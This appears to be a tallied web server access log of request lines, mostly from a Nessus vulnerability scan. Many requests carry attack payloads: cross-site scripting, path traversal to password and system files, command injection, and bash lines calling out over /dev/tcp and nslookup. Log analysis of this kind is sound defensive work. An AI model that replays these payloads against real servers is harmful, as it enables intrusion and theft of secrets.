1 GET /829kmkjg.cgi?<script>document.cookie=%22testluua=8196;%22</script> HTTP/1.1
1 GET /829kmkjg.dll?<meta%20http-equiv=Set-Cookie%20content=%22testluua=8196%22> HTTP/1.1
1 GET /829kmkjg.dll?<script>document.cookie=%22testluua=8196;%22</script> HTTP/1.1
1 GET /829kmkjg.do?<meta%20http-equiv=Set-Cookie%20content=%22testluua=8196%22> HTTP/1.1
1 GET /829kmkjg.do?<script>document.cookie=%22testluua=8196;%22</script> HTTP/1.1
1 GET /829kmkjg.exe?<meta%20http-equiv=Set-Cookie%20content=%22testluua=8196%22> HTTP/1.1
1 GET /829kmkjg.exe?<script>document.cookie=%22testluua=8196;%22</script> HTTP/1.1
1 GET /829kmkjg.fts?<meta%20http-equiv=Set-Cookie%20content=%22testluua=8196%22> HTTP/1.1
1 GET /829kmkjg.fts?<script>document.cookie=%22testluua=8196;%22</script> HTTP/1.1
1 GET /829kmkjg.htm?<meta%20http-equiv=Set-Cookie%20content=%22testluua=8196%22> HTTP/1.1
1 GET /829kmkjg.htm?<script>document.cookie=%22testluua=8196;%22</script> HTTP/1.1
1 GET /829kmkjg.html?<meta%20http-equiv=Set-Cookie%20content=%22testluua=8196%22> HTTP/1.1
1 GET /829kmkjg.html?<script>document.cookie=%22testluua=8196;%22</script> HTTP/1.1
1 GET /829kmkjg.idc?<meta%20http-equiv=Set-Cookie%20content=%22testluua=8196%22> HTTP/1.1
1 GET /829kmkjg.idc?<script>document.cookie=%22testluua=8196;%22</script> HTTP/1.1
1 GET /829kmkjg.jsp?<meta%20http-equiv=Set-Cookie%20content=%22testluua=8196%22> HTTP/1.1
1 GET /829kmkjg.jsp?<script>document.cookie=%22testluua=8196;%22</script> HTTP/1.1
1 GET /829kmkjg.jspa?<meta%20http-equiv=Set-Cookie%20content=%22testluua=8196%22> HTTP/1.1
1 GET /829kmkjg.jspa?<script>document.cookie=%22testluua=8196;%22</script> HTTP/1.1
1 GET /829kmkjg.kspx?<meta%20http-equiv=Set-Cookie%20content=%22testluua=8196%22> HTTP/1.1
1 GET /829kmkjg.kspx?<script>document.cookie=%22testluua=8196;%22</script> HTTP/1.1
1 GET /829kmkjg.mscgi?<meta%20http-equiv=Set-Cookie%20content=%22testluua=8196%22> HTTP/1.1
1 GET /829kmkjg.mscgi?<script>document.cookie=%22testluua=8196;%22</script> HTTP/1.1
1 GET /829kmkjg.nsf?<meta%20http-equiv=Set-Cookie%20content=%22testluua=8196%22> HTTP/1.1
1 GET /829kmkjg.nsf?<script>document.cookie=%22testluua=8196;%22</script> HTTP/1.1
1 GET /829kmkjg.php3?<meta%20http-equiv=Set-Cookie%20content=%22testluua=8196%22> HTTP/1.1
1 GET /829kmkjg.php3?<script>document.cookie=%22testluua=8196;%22</script> HTTP/1.1
1 GET /829kmkjg.php?<meta%20http-equiv=Set-Cookie%20content=%22testluua=8196%22> HTTP/1.1
1 GET /829kmkjg.php?<script>document.cookie=%22testluua=8196;%22</script> HTTP/1.1
1 GET /829kmkjg.pl?<meta%20http-equiv=Set-Cookie%20content=%22testluua=8196%22> HTTP/1.1
1 GET /829kmkjg.pl?<script>document.cookie=%22testluua=8196;%22</script> HTTP/1.1
1 GET /829kmkjg.x?<meta%20http-equiv=Set-Cookie%20content=%22testluua=8196%22> HTTP/1.1
1 GET /829kmkjg.x?<script>document.cookie=%22testluua=8196;%22</script> HTTP/1.1
1 GET /<meta%20http-equiv=Set-Cookie%20content=%22testluua=8196%22> HTTP/1.1
1 GET /<script>document.cookie=%22testluua=8196;%22</script> HTTP/1.1
1 GET /<script>foo</script> HTTP/1.1
1 GET /?<meta%20http-equiv=Set-Cookie%20content=%22testluua=8196%22> HTTP/1.1
1 GET /?<script>document.cookie=%22testluua=8196;%22</script> HTTP/1.1
1 GET /?M=A HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?\"><script>alert('struts_sa_surl_xss.nasl-1665325673')</script> HTTP/1.1
2 GET /? HTTP/1.1
1 GET /?class.classLoader.URLs[0]=struts_2_3_16_1_classloader_manipulation-1665325677 HTTP/1.1
1 GET /?ho+{COMPLETE_VERSION} HTTP/1.1
1 GET /AdminTools/querybuilder/nn.jsp HTTP/1.1
1 GET /CFIDE/administrator/index.cfm HTTP/1.1
1 GET /CFIDE/administrator/settings/version.cfm HTTP/1.1
2 GET /CSCOnm/servlet/login/login.jsp HTTP/1.1
1 GET /CVS/Entries HTTP/1.1
1 GET /ConsoleHelp/default.jsp HTTP/1.1
1 GET /ControlManager/default.htm HTTP/1.1
1 GET /ControllerWeb/ HTTP/1.1
1 GET /D5UdeXwN.aspx HTTP/1.1
1 GET /DB4Web/WIN-10-NESACUAL:23/foo HTTP/1.1
1 GET /Default.aspx HTTP/1.1
1 GET /DesktopDirector HTTP/1.1
1 GET /Director HTTP/1.1
1 GET /HNAP1/ HTTP/1.1
1 GET /Home.do HTTP/1.1
1 GET /IDMProv/jsps/help/Help.jsp HTTP/1.1
1 GET /InitialPage.asp HTTP/1.1
1 GET /Login.aspx HTTP/1.1
4 GET /LoginPage.do HTTP/1.1
1 GET /MM/ HTTP/1.1
1 GET /MSWSMTP/Common/Authentication/Logon.aspx HTTP/1.1
2 GET /NASApp/nessus/ HTTP/1.1
1 GET /NCMContainer.cc HTTP/1.1
1 GET /NULL.ida HTTP/1.1
1 GET /OEMSettings.ini HTTP/1.1
1 GET /Orion/Login.asp HTTP/1.1
1 GET /Orion/Login.aspx HTTP/1.1
1 GET /OvCgi/freeIPaddrs.ovpl?netnum=127.0.0.1&netmask=255.255.255.0&netid=127.0.0.1%20|%20id| HTTP/1.1
1 GET /PUBLIC/ADMIN/INDEX.HTM HTTP/1.1
1 GET /PassTrixMain.cc HTTP/1.1
1 GET /Portal/Portal.mwsl?MainSelection=USFW&TabSelection=NONE&ClientArea=/Portal/usfw-login.mwsl&DataFile=NONE&TemplateFile=NONE HTTP/1.1
1 GET /Public/home/js/check.js HTTP/1.1
1 GET /RSAarcher/Default.asp HTTP/1.1
1 GET /RSAarcher/Default.aspx HTTP/1.1
1 GET /Reporting/login/change_password.php?enable_auth=0 HTTP/1.1
1 GET /SAPHostControl/?wsdl HTTP/1.1
2 GET /SE/EMC_SE.swf HTTP/1.1
1 GET /SE/appInfo.xml HTTP/1.1
1 GET /Sametime/buildinfo.txt HTTP/1.1
1 GET /Sametime/domino/html/sametime/buildinfoST75CF1.txt HTTP/1.1
1 GET /SilverStream/Meta/Tables/?access-mode=text HTTP/1.1
1 GET /SilverStream HTTP/1.1
1 GET /SiteScope/ HTTP/1.1
1 GET /SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator HTTP/1.1
1 GET /SnoopServlet/ HTTP/1.1
1 GET /TPkUcUa6K4ZL.asp HTTP/1.1
1 GET /TPkUcUa6K4ZL.cfm HTTP/1.1
1 GET /TPkUcUa6K4ZL.cgi HTTP/1.1
1 GET /TPkUcUa6K4ZL.html HTTP/1.1
1 GET /TPkUcUa6K4ZL.inc HTTP/1.1
1 GET /TPkUcUa6K4ZL.php3 HTTP/1.1
1 GET /TPkUcUa6K4ZL.php HTTP/1.1
1 GET /TPkUcUa6K4ZL.pl HTTP/1.1
1 GET /TPkUcUa6K4ZL.sh HTTP/1.1
1 GET /TPkUcUa6K4ZL.shtml HTTP/1.1
1 GET /TRXTP0ua.ashx HTTP/1.1
1 GET /UDataArea?plugin=com.dell.oma.webplugins.AboutWebPlugin HTTP/1.1
1 GET /ViewerFrame?Mode=Motion HTTP/1.1
2 GET /VncViewer.jar HTTP/1.1
1 GET /WEB-INF./web.xml HTTP/1.1
1 GET /WebID/IISWebAgentIF.dll?postdata=\"><script>foo</script> HTTP/1.1
1 GET /Webcam/webcam.html HTTP/1.1
1 GET /Websense/cgi-bin/WsCgiLogin.exe?Page=login&UserName=nessus%22%3e%3cscript%3ealert('websense_username_xss.nasl')%3c%2fscript%3e HTTP/1.1
1 GET /Wsusadmin/Errors/BrowserSettings.aspx HTTP/1.1
2 GET /_SIgiXHyByLp HTTP/1.1
3 GET /_mt/mt.cgi HTTP/1.1
16 GET /_profiler/phpinfo HTTP/1.1
1 GET /_vti_bin/fpcount.exe HTTP/1.1
1 GET /_vti_bin/shtml.dll/_vti_rpc HTTP/1.1
16 GET /_wpeprivate/config.json HTTP/1.1
1 GET /about.jsp HTTP/1.1
1 GET /about HTTP/1.1
1 GET /aboutprinter.html HTTP/1.1
1 GET /acopia/ HTTP/1.1
1 GET /active.log HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /admin.back HTTP/1.1
3 GET /admin.cgi HTTP/1.1
16 GET /admin/.env HTTP/1.1
1 GET /admin/LocalIndex.html HTTP/1.1
2 GET /admin/ HTTP/1.1
1 GET /admin/airflow/login HTTP/1.1
1 GET /admin/login.do HTTP/1.1
2 GET /admin/login.jsp HTTP/1.1
1 GET /admin/public/index.html HTTP/1.1
1 GET /admin/statistics/ConfigureStatistics HTTP/1.1
1 GET /admin_ui/mas/ent/login.html HTTP/1.1
3 GET /administrator.cgi HTTP/1.1
1 GET /altercast/AlterCast?op=%3cscript%3ealert(%22adobe_document_server_61.nasl%22)%3c%2fscript%3e HTTP/1.1
1 GET /ap// HTTP/1.1
1 GET /apex/f?p=nessuscheck HTTP/1.1
1 GET /apex/listenerConfigure HTTP/1.1
1 GET /api/getServices?name[]=$(/bin/bash%20-c%20%22nslookup%20log4shell-generic-T2t2HgBMbrLL1XAGbKgsten.w.nessus.org) HTTP/1.1
1 GET /api/getServices?name[]=$(bash%20-c%20%22echo%20exploited_PORT[80]by_nessus%20%3E/dev/tcp/192.168.130.170/3505\") HTTP/1.1
1 GET /api/hpe-restapi.json HTTP/1.1
1 GET /api/sonicos/is-sslvpn-enabled HTTP/1.1
1 GET /api/v1.0/environment HTTP/1.1
2 GET /api/v1/?format=api HTTP/1.1
1 GET /api HTTP/1.1
16 GET /app/config.yml HTTP/1.1
16 GET /app/config/parameters.yml HTTP/1.1
1 GET /app/idxasp.html HTTP/1.1
1 GET /app/ui/login.jsp HTTP/1.1
1 GET /apps/zxtm/login.cgi HTTP/1.1
16 GET /asdf.php HTTP/1.1
1 GET /assets/js/conf/global_config.js HTTP/1.1
3 GET /auth/login HTTP/1.1
1 GET /authenticate/login HTTP/1.1
1 GET /autodiscover/autodiscover.xml HTTP/1.0
1 GET /autopass/login_input HTTP/1.1
1 GET /av/api/1.0/system/local/tasks HTTP/1.1
1 GET /axis/DirectDownload.jsp HTTP/1.1
1 GET /axis2/services/CUPMService/ping HTTP/1.1
1 GET /baselining/version HTTP/1.1
16 GET /beta/.env HTTP/1.1
1 GET /bitrix/admin/index.php?lang=en HTTP/1.1
1 GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0
1 GET /brightmail/viewLogin.do HTTP/1.1
1 GET /broadWeb/bwRoot.asp HTTP/1.1
1 GET /btmui/ HTTP/1.1
3 GET /buglist.cgi HTTP/1.1
1 GET /builtin/index.html HTTP/1.1
1 GET /cas/login HTTP/1.1
1 GET /caucho-status HTTP/1.1
1 GET /cfg/shortcuts HTTP/1.1
3 GET /cgi-bin-sdb/printenv HTTP/1.1
1 GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1
1 GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1
3 GET /cgi-bin/Count.cgi HTTP/1.1
3 GET /cgi-bin/FormHandler.cgi HTTP/1.1
3 GET /cgi-bin/FormMail.cgi HTTP/1.1
1 GET /cgi-bin/TPkUcUa6K4ZL.asp HTTP/1.1
1 GET /cgi-bin/TPkUcUa6K4ZL.cfm HTTP/1.1
1 GET /cgi-bin/TPkUcUa6K4ZL.cgi HTTP/1.1
1 GET /cgi-bin/TPkUcUa6K4ZL.html HTTP/1.1
1 GET /cgi-bin/TPkUcUa6K4ZL.inc HTTP/1.1
1 GET /cgi-bin/TPkUcUa6K4ZL.php3 HTTP/1.1
1 GET /cgi-bin/TPkUcUa6K4ZL.php HTTP/1.1
1 GET /cgi-bin/TPkUcUa6K4ZL.pl HTTP/1.1
1 GET /cgi-bin/TPkUcUa6K4ZL.sh HTTP/1.1
1 GET /cgi-bin/TPkUcUa6K4ZL.shtml HTTP/1.1
3 GET /cgi-bin/admin.cgi HTTP/1.1
3 GET /cgi-bin/admin.pl HTTP/1.1
3 GET /cgi-bin/admin HTTP/1.1
3 GET /cgi-bin/administrator.cgi HTTP/1.1
3 GET /cgi-bin/administrator HTTP/1.1
3 GET /cgi-bin/agorn.cgi HTTP/1.1
1 GET /cgi-bin/authLogin.cgi HTTP/1.1
3 GET /cgi-bin/bugreport.cgi HTTP/1.1
1 GET /cgi-bin/camctrl.cgi HTTP/1.1
3 GET /cgi-bin/cart.cgi HTTP/1.1
1 GET /cgi-bin/client_execute.cgi?tUD=0 HTTP/1.1
3 GET /cgi-bin/clwarn.cgi HTTP/1.1
1 GET /cgi-bin/com5.pl HTTP/1.1
3 GET /cgi-bin/count.cgi HTTP/1.1
1 GET /cgi-bin/ctrldirect.cgi HTTP/1.1
1 GET /cgi-bin/faqmanager.cgi?toc=/etc/passwd%00 HTTP/1.1
3 GET /cgi-bin/faqmanager.cgi HTTP/1.1
1 GET /cgi-bin/filescan HTTP/1.1
3 GET /cgi-bin/guestbook.cgi HTTP/1.1
1 GET /cgi-bin/guestimage.html HTTP/1.1
3 GET /cgi-bin/help.cgi HTTP/1.1
3 GET /cgi-bin/hi HTTP/1.1
4 GET /cgi-bin/index.cgi HTTP/1.1
3 GET /cgi-bin/index.pl HTTP/1.1
3 GET /cgi-bin/index.sh HTTP/1.1
1 GET /cgi-bin/kvm.cgi?&file=login HTTP/1.1
3 GET /cgi-bin/login.cgi HTTP/1.1
1 GET /cgi-bin/login HTTP/1.1
1 GET /cgi-bin/luci HTTP/1.1
3 GET /cgi-bin/mailit.pl HTTP/1.1
3 GET /cgi-bin/mt-static/mt-check.cgi HTTP/1.1
3 GET /cgi-bin/mt-static/mt-load.cgi HTTP/1.1
3 GET /cgi-bin/mt/mt-check.cgi HTTP/1.1
3 GET /cgi-bin/mt/mt-load.cgi HTTP/1.1
3 GET /cgi-bin/ncbook/book.cgi HTTP/1.1
1 GET /cgi-bin/pdesk.cgi?lang=../../../../../../../../etc/passwd%00 HTTP/1.1
3 GET /cgi-bin/printenv.cgi HTTP/1.1
4 GET /cgi-bin/printenv HTTP/1.1
1 GET /cgi-bin/pub/pki?cmd=serverInfo HTTP/1.1
3 GET /cgi-bin/quickstore.cgi HTTP/1.1
3 GET /cgi-bin/search.cgi HTTP/1.1
3 GET /cgi-bin/search/search.cgi HTTP/1.1
3 GET /cgi-bin/search HTTP/1.1
3 GET /cgi-bin/status.cgi HTTP/1.1
3 GET /cgi-bin/status HTTP/1.1
3 GET /cgi-bin/test-cgi HTTP/1.1
3 GET /cgi-bin/test.cgi HTTP/1.1
3 GET /cgi-bin/test.sh HTTP/1.1
3 GET /cgi-bin/upload.cgi HTTP/1.1
3 GET /cgi-bin/urlcount.cgi HTTP/1.1
3 GET /cgi-bin/viewcvs.cgi HTTP/1.1
3 GET /cgi-bin/wa.cgi HTTP/1.1
3 GET /cgi-bin/wa.exe HTTP/1.1
3 GET /cgi-bin/wa HTTP/1.1
3 GET /cgi-bin/whois.cgi HTTP/1.1
4 GET /cgi-mod/index.cgi HTTP/1.1
3 GET /cgi-sys/defaultwebpage.cgi HTTP/1.1
3 GET /cgi-sys/entropysearch.cgi HTTP/1.1
3 GET /cgi/mid.cgi HTTP/1.1
1 GET /chassis/config/GeneralChassisConfig.html HTTP/1.1
1 GET /client/ HTTP/1.1
1 GET /clientaccesspolicy.xml HTTP/1.1
1 GET /cmf/login HTTP/1.1
1 GET /com/novell/webaccess/WebAccessUninstall.ini HTTP/1.1
1 GET /common/about.php HTTP/1.1
1 GET /commoncgi/servlet/CCGIServlet?ApHost=PDT_InterScan_NT&CGIAlias=PDT_InterScan_NT&File=logout.htm HTTP/1.1
1 GET /conf/ssl/apache/integrity-smartcenter.key HTTP/1.1
1 GET /conf/ssl/apache/integrity.key HTTP/1.1
16 GET /config.env HTTP/1.1
16 GET /config.js HTTP/1.1
16 GET /config.json HTTP/1.1
16 GET /config/config.js HTTP/1.1
16 GET /config/config.json HTTP/1.1
3 GET /config/getuser?index=0 HTTP/1.1
16 GET /config/secrets.yml HTTP/1.1
1 GET /configurations.do HTTP/1.1
16 GET /console/base/config.json HTTP/1.1
1 GET /console/faces/com_sun_web_ui/help/helpwindow.jsp?windowTitle=%3c/title%3e%3cscript%3ealert(%27sun_java_web_console_helpwindow_xss.nasl%27)%3c/script%3e HTTP/1.1
1 GET /console/faces/com_sun_web_ui/help/masthead.jsp?windowTitle=%3c/title%3e%3cscript%3ealert(%27sun_java_web_console_helpwindow_xss.nasl%27)%3c/script%3e HTTP/1.1
1 GET /console/login/LoginForm.jsp HTTP/1.1
16 GET /console/payments/config.json HTTP/1.1
1 GET /content/CVoq1j7uv1.mp3 HTTP/1.0
1 GET /core/misc/drupal.js HTTP/1.1
1 GET /core/orionSplashScreen.do HTTP/1.1
1 GET /courier/web/1000@/wmLogin.html HTTP/1.1
1 GET /crossdomain.xml HTTP/1.1
1 GET /cs/idcplg?IdcService=GET_ENVIRONMENT&IsJson=1 HTTP/1.1
1 GET /csamc52/webadmin?page=invalid&type=browser HTTP/1.1
1 GET /cwhp/CSMSDesktop/about.jsp HTTP/1.1
1 GET /cwhp/XmpFileDownloadServlet?parameterName=downloadDoc&downloadDirectory=..\\..\\..\\Windows\\System32\\drivers\\etc\\&readmeText=1 HTTP/1.1
16 GET /dashboard/phpinfo.php HTTP/1.1
16 GET /database.yml HTTP/1.1
1 GET /ddem/ HTTP/1.1
16 GET /debug/default/view?panel=config HTTP/1.1
1 GET /debuginfo.htm HTTP/1.1
1 GET /default.php HTTP/1.1
1 GET /dev/ HTTP/1.1
1 GET /devinfo.xml HTTP/1.1
1 GET /dfcweb/lib/cupm/nls/applicationproperties.js HTTP/1.1
1 GET /dms2/Login.jsp HTTP/1.1
1 GET /dndirector/dashboard/Show.dn HTTP/1.1
1 GET /dndirector HTTP/1.1
1 GET /dp/login.xml HTTP/1.1
1 GET /drupal/ HTTP/1.1
1 GET /drupal/core/misc/drupal.js HTTP/1.1
1 GET /drupal/misc/drupal.js HTTP/1.1
1 GET /drupal/update.php?op=info HTTP/1.1
1 GET /dtlt/home.html HTTP/1.1
1 GET /dwr/index.html HTTP/1.1
1 GET /emsam/index.html HTTP/1.1
1 GET /en/main.js HTTP/1.1
1 GET /enter.php?goto=%2F HTTP/1.1
16 GET /env.backup HTTP/1.1
16 GET /env.config.js HTTP/1.1
16 GET /env.js HTTP/1.1
1 GET /eonapi/getAuthenticationStatus HTTP/1.1
1 GET /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cautoexec.bat HTTP/1.1
1 GET /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini HTTP/1.1
1 GET /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini HTTP/1.1
1 GET /error_page.htm HTTP/1.1
1 GET /etc/passwd HTTP/1.1
1 GET /event/index.do HTTP/1.1
1 GET /ews/index.htm HTTP/1.1
1 GET /examples/jsp/source.jsp?%2e%2e/%2e%2e/%2e%2e/%2e%2e/system/autoexec.ncf HTTP/1.1
1 GET /exchweb/bin/auth/owalogon.asp?url=http[:]//12345678910 HTTP/1.1
1 GET /eyespyfx_large.jsp HTTP/1.1
1 GET /f360/login.jsp HTTP/1.1
9 GET /favicon.ico HTTP/1.1
1 GET /favicon.iso HTTP/1.1
1 GET /favicon2.iso HTTP/1.1
1 GET /fdtiLduN.ashx HTTP/1.1
1 GET /features HTTP/1.1
1 GET /file HTTP/1.1
1 GET /fogbugz/default.php HTTP/1.1
1 GET /forum.php HTTP/1.1
16 GET /frontend_dev.php/$ HTTP/1.1
1 GET /gateway/login HTTP/1.1
1 GET /getxml HTTP/1.1
1 GET /global.asa HTTP/1.1
1 GET /gnvPJoPv.aspx HTTP/1.1
1 GET /gwadmin-console/login.jsp HTTP/1.1
1 GET /hazelcast/rest/cluster HTTP/1.1
1 GET /hc/admin/login/ HTTP/1.1
1 GET /hc/error/ HTTP/1.1
2 GET /header.php?tab=status HTTP/1.1
1 GET /header.php HTTP/1.1
1 GET /help/contents.htm HTTP/1.1
1 GET /help/introduction/release-notes.html HTTP/1.1
1 GET /helpdesk/WebObjects/Helpdesk.woa HTTP/1.1
1 GET /home.asp HTTP/1.1
3 GET /home.htm HTTP/1.1
1 GET /home.jsf?autoScroll=0%2c275)%3b%2f%2f--%3e%3c%2fscript%3e%3cscript%3ealert('myfaces_tomahawk_autoscroll_xss.nasl' HTTP/1.1
1 GET /home.seam HTTP/1.1
1 GET /horde/imp/status.php3 HTTP/1.1
1 GET /html/en/index.htm HTTP/1.1
1 GET /html/iscscada.htm HTTP/1.1
16 GET /i.php HTTP/1.1
1 GET /iView3/pages/version.frag HTTP/1.1
1 GET /ibmmq/console/login.html HTTP/1.1
1 GET /ibmmq/console/nls/en/strings.json HTTP/1.1
1 GET /idc/idcplg?IdcService=GET_ENVIRONMENT&IsJson=1 HTTP/1.1
1 GET /idm/login.jsp?lang=en&cntry= HTTP/1.1
1 GET /ifx/?LO=../../../../../etc/passwd HTTP/1.1
1 GET /igsponsor HTTP/1.1
1 GET /iisadmpwd/aexp.htr HTTP/1.1
1 GET /iisadmpwd/aexp2.htr HTTP/1.1
1 GET /iisadmpwd/aexp2b.htr HTTP/1.1
1 GET /iisadmpwd/aexp3.htr HTTP/1.1
1 GET /iisadmpwd/aexp4.htr HTTP/1.1
1 GET /iisadmpwd/aexp4b.htr HTTP/1.1
1 GET /iisprotect/admin/SiteAdmin.ASP?V_SiteName=&V_FirstTab=Groups&V_SecondTab=All&GroupName=nessus' HTTP/1.1
1 GET /iisprotect/admin/SiteAdmin.ASP?V_SiteName=&V_FirstTab=Groups&V_SecondTab=All&GroupName=nessus HTTP/1.1
1 GET /images/login_top.gif HTTP/1.1
1 GET /images/logon_merge.gif HTTP/1.1
1 GET /images HTTP/1.1
1 GET /images HTTP/1.0
1 GET /imc HTTP/1.1
1 GET /img/main.cgi?next_file=main.htm HTTP/1.1
1 GET /imp/status.php3 HTTP/1.1
1 GET /index.JSP HTTP/1.1
1 GET /index.aspx HTTP/1.1
3 GET /index.cgi HTTP/1.1
1 GET /index.do HTTP/1.1
1 GET /index.exp HTTP/1.1
1 GET /index.html?urlmaskfilter=<script>foo</script> HTTP/1.1
7 GET /index.html HTTP/1.1
1 GET /index.jsp%00x HTTP/1.1
3 GET /index.jsp HTTP/1.1
1 GET /index.php/123 HTTP/1.1
1 GET /index.php HTTP/1.1
3 GET /index.pl HTTP/1.1
3 GET /index.sh HTTP/1.1
16 GET /info.json HTTP/1.1
16 GET /info.php HTTP/1.1
16 GET /infophp.php HTTP/1.1
16 GET /infos.php HTTP/1.1
1 GET /internalServerReporting.php HTTP/1.1
1 GET /interscan/cgi-bin/FtpSave.dll?I'm%20Here HTTP/1.1
1 GET /intruvert/jsp/admin/Login.jsp HTTP/1.1
1 GET /invoker/EJBInvokerServlet HTTP/1.1
1 GET /invoker/JMXInvokerServlet HTTP/1.1
1 GET /item.fts?href=%22%3E%3Cscript%3Ealert(%22ftgate_44002.nasl%22)%3C%2Fscript%3E%3B HTTP/1.1
1 GET /ivc2/Backup/IVC1/html/index.htm HTTP/1.1
1 GET /js/Device.js HTTP/1.1
16 GET /js/config.js HTTP/1.1
16 GET /js/envConfig.js HTTP/1.1
5 GET /js/hpsum/hpsum-version.js HTTP/1.1
1 GET /jts/ HTTP/1.1
16 GET /kyc/.env HTTP/1.1
1 GET /lang_pack/EN.js HTTP/1.1
16 GET /laravel/.env HTTP/1.1
16 GET /laravel/core/.env HTTP/1.1
1 GET /lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse HTTP/1.1
1 GET /lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/test.jse HTTP/1.1
1 GET /lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../system/autoexec.ncf HTTP/1.1
1 GET /ldap/cgi-bin/ldacgi.exe?Action=Substitute&Template=../../../../../boot.ini&Sub=LocalePath&LocalePath=enus1252 HTTP/1.1
1 GET /lem/index.html HTTP/1.1
1 GET /libs/granite/core/content/login.html HTTP/1.1
1 GET /links_en.html HTTP/1.1
16 GET /linusadmin-phpinfo.php HTTP/1.1
1 GET /login.do HTTP/1.1
1 GET /login.htm HTTP/1.1
1 GET /login.html?1600 HTTP/1.1
8 GET /login.html HTTP/1.1
2 GET /login.jsp HTTP/1.1
3 GET /login.php HTTP/1.1
1 GET /login.web HTTP/1.1
2 GET /login/ HTTP/1.1
1 GET /login1.htm HTTP/1.1
3 GET /login?redirects=10 HTTP/1.1
1 GET /login?user=**%3Cscript%3EJavaScript:alert('cpanel_login_user_xss.nasl')%3B%3C%2Fscript%3E HTTP/1.1
1 GET /loginMsg.js HTTP/1.1
1 GET /login_up.php3?login_name=x&passwd=x&locale_id=../../../../../../../../../../../../boot.ini%00.jpg HTTP/1.1
15 GET /login HTTP/1.1
1 GET /logon.jsp HTTP/1.1
1 GET /logon?onok=%22%3e%3cscript%3ealert('axon_logon_xss.nasl')%3c%2fscript%3e HTTP/1.1
1 GET /logout HTTP/1.0
1 GET /mail/ HTTP/1.1
16 GET /mailer/.env HTTP/1.1
1 GET /main.cgi?next_file=main.htm HTTP/1.1
1 GET /main/web/status/ HTTP/1.1
1 GET /main_internet.php HTTP/1.1
1 GET /mainui/ HTTP/1.1
1 GET /manual/ag/contents.htm HTTP/1.1
1 GET /map/sitemap.xml HTTP/1.1
1 GET /mapviewer/omserver?getv=t HTTP/1.1
1 GET /menu.htm HTTP/1.1
1 GET /mgmt/login?dest=%2Fmgmt%2Fgui%3Fp%3Dhome&reason=&username= HTTP/1.1
1 GET /misc/drupal.js HTTP/1.1
1 GET /mod_gzip_status HTTP/1.1
1 GET /mve/help/en/inventory/am_about.html HTTP/1.1
1 GET /mxhelp/cgi-bin/namazucgi?lang=/../../../../../../../../../../../../../boot.ini HTTP/1.1
1 GET /nacos/ HTTP/1.1
1 GET /names.nsf/view?ReadDesign HTTP/1.1
2 GET /nessus345678.html HTTP/1.1
1 GET /nessus\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1
1 GET /nessus\\..\\..\\..\\..\\..\\..\\winnt\\win.ini HTTP/1.1
1 GET /netbasic/websinfo.bas HTTP/1.1
1 GET /netflow/html/aboutus.jsp HTTP/1.1
1 GET /netmri/config/userAdmin/login.tdf HTTP/1.1
1 GET /niet1079873928.php4 HTTP/1.1
1 GET /niet1358759605.php5 HTTP/1.1
1 GET /niet1615184182.asp HTTP/1.1
1 GET /niet1931129179.jspx HTTP/1.1
1 GET /niet1949624902.aspx HTTP/1.1
1 GET /niet1997640690.php6 HTTP/1.1
1 GET /niet2044560569.jsp HTTP/1.1
1 GET /niet2142994477.htm HTTP/1.1
1 GET /niet297864491 HTTP/1.1
1 GET /niet364525395. HTTP/1.1
1 GET /niet415916042.php3 HTTP/1.1
1 GET /niet498946461.cfm HTTP/1.1
1 GET /niet703803170.html HTTP/1.1
1 GET /niet709264117.php HTTP/1.1
1 GET /niet884748219.shtml HTTP/1.1
1 GET /niet990611492.shtm HTTP/1.1
1 GET /nifi/ HTTP/1.1
1 GET /nls/ApplicationProperties-en.json HTTP/1.1
1 GET /nnm/main HTTP/1.1
1 GET /no_such_file_aoLO4FsV.html HTTP/1.1
1 GET /nosuchfile-132346005-1698157507.jsp HTTP/1.1
1 GET /note.txt?F_notini=&T_note=&nomentreprise=blah&filenote=../../windows/win.ini HTTP/1.1
1 GET /note.txt?F_notini=&T_note=&nomentreprise=blah&filenote=../../winnt/win.ini HTTP/1.1
3 GET /nph-mr.cgi HTTP/1.1
1 GET /nps/servlet/portal HTTP/1.1
1 GET /nps/servlet/portalservice HTTP/1.1
1 GET /nsn/..%5Cutil/chkvol.bas HTTP/1.1
1 GET /nsn/..%5Cutil/dir.bas HTTP/1.1
1 GET /nsn/..%5Cutil/glist.bas HTTP/1.1
1 GET /nsn/..%5Cutil/lancard.bas HTTP/1.1
1 GET /nsn/..%5Cutil/set.bas HTTP/1.1
1 GET /nsn/..%5Cutil/userlist.bas HTTP/1.1
1 GET /nsn/..%5Cweb/env.bas HTTP/1.1
1 GET /nsn/..%5Cwebdemo/fdir.bas HTTP/1.1
1 GET /nsn/env.bas HTTP/1.1
1 GET /nsn/fdir.bas HTTP/1.1
1 GET /nul.dbm HTTP/1.1
1 GET /ofbizsetup/control/checkLogin HTTP/1.1
1 GET /officescan/console/html/common/l10n/l10n.global.js HTTP/1.1
16 GET /old_phpinfo.php HTTP/1.1
1 GET /oo/ HTTP/1.1
1 GET /ordermgr/control/checkLogin HTTP/1.1
1 GET /ords/ HTTP/1.1
1 GET /ossim/session/login.php HTTP/1.1
1 GET /otrs/index.pl HTTP/1.1
1 GET /page/portal/Design_Time_PG/Welcome HTTP/1.1
1 GET /pages/login.php HTTP/1.1
1 GET /password HTTP/1.1
1 GET /perl/samples/env.pl HTTP/1.1
1 GET /perl/samples/lancgi.pl HTTP/1.1
1 GET /perl/samples/ndslogin.pl HTTP/1.1
1 GET /perl/samples/volscgi.pl HTTP/1.1
